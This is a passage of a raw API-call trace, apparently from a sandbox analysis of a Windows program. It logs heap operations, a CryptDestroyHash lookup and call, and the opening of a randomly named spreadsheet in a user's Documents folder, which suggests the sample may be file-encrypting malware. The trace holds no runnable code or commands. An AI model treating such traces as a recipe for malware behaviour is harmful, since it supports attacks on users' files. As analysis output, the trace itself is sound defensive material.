Size=0xc) returned 0x43cadd8 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafb8 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf40 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0079.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0079.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb000 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0079.540] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0079.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0079.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0079.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0079.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0079.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0079.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0079.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0079.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0079.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0079.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0079.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797048 [0079.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0079.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0079.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0079.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0079.542] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0079.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0079.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0079.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0079.542] CryptDestroyHash (hHash=0x41abfc0) returned 1 [0079.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0079.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0079.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0079.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0079.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0079.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0079.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0079.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0079.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0079.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.544] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0079.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0079.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0079.546] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0079.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0079.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0079.547] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0079.547] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.547] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IWVSvvMxlOfdD1.ods" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\iwvsvvmxlofdd1.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0079.547] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.547] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0079.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 